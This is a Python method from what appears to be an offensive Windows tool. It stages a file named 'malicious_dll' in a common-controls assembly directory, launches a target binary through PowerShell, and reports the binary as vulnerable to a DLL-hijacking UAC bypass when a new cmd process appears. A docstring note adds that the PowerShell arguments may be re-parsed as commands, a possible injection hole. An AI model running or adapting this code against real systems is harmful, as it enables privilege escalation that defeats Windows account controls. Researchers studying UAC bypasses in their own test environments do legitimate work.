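def handle_dll_local(self, subpath, binary):
    """Stage the test DLL under *subpath*, run *binary* once and record the outcome.

    Steps, all driven through ``powershell -C``:

    1. Remove any existing *subpath* (best effort).
    2. Create the common-controls assembly directory below *subpath* and copy
       ``self.args["malicious_dll"]`` into it.
    3. Launch *binary*, wait one second, then ask ``self.is_cmd_open`` about the
       PIDs snapshotted before the launch. A true result appends *binary* to
       ``self._results["vulnerables"]``; otherwise it is appended to
       ``self._results['sospechosos']`` (Spanish for "suspicious").
    4. Call ``self.kill`` with the before/after PID snapshots and remove
       *subpath* again.

    Args:
        subpath: Directory created for the test. It is recursively
            force-deleted before and after the run.
        binary: Command handed to ``powershell -C`` for execution.

    Returns:
        None. A ``subprocess.CalledProcessError`` from any step is reported on
        stdout instead of being raised.

    NOTE(review): *subpath*, *binary* and the DLL path are passed to
    ``powershell -C`` as bare arguments. PowerShell presumably re-parses them
    as command text, so values with spaces or metacharacters may not be
    treated as literal paths. Confirm callers only pass trusted values.
    """
    path = subpath + "\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.0_none_583b8639f462029f\\"
    remove_cmd = ["powershell", "-C", "rm", "-r", "-Force", subpath]
    # Single-argument print(...) parses the same under Python 2 and Python 3.
    try:
        try:
            subprocess.check_call(
                remove_cmd + ["-erroraction", "'silentlycontinue'"])
        except (subprocess.CalledProcessError, OSError):
            # Best effort: the directory usually does not exist yet. A bare
            # ``except`` here would also swallow KeyboardInterrupt.
            pass
        print("[+] Creating: " + path)
        subprocess.check_call(
            ["powershell", "-C", "mkdir", path, ">", "$null"])
        print("[+] Copying the malicious dll to the path")
        subprocess.check_call(
            ["powershell", "-C", "cp", self.args["malicious_dll"], path])
        # Snapshot taken before the launch so later checks can tell which
        # processes are new.
        prev_pids = psutil.pids()
        print("[*] Executing the binary")
        subprocess.check_call(["powershell", "-C", binary])
        time.sleep(1)
        if self.is_cmd_open(prev_pids):
            print(colored("[*] THIS BINARY IS VULNERABLE TO DLL HIJACKING UAC BYPASS!", 'cyan', attrs=['bold']))
            if binary not in self._results["vulnerables"]:
                self._results["vulnerables"].append(binary)
        elif binary not in self._results['sospechosos']:
            self._results['sospechosos'].append(binary)
        new_pids = psutil.pids()
        self.kill(binary, prev_pids, new_pids)
    except subprocess.CalledProcessError as error:
        print("ERROR: COPYING THE FILE")
        # The message above is printed for every failing step, so also report
        # which command actually failed.
        print("[!] Command failed (exit code %s): %s" % (error.returncode, error.cmd))
    finally:
        # Runs on every exit path so the staged directory and the copied DLL
        # are not left on disk when an earlier step fails.
        print("[-] Deleting the path and cleaning up\n")
        try:
            subprocess.check_call(remove_cmd)
        except (subprocess.CalledProcessError, OSError) as error:
            # Reported and swallowed so that a cleanup failure does not
            # replace an exception already propagating from the try body.
            print("ERROR: COULD NOT REMOVE %s (%s)" % (subpath, error))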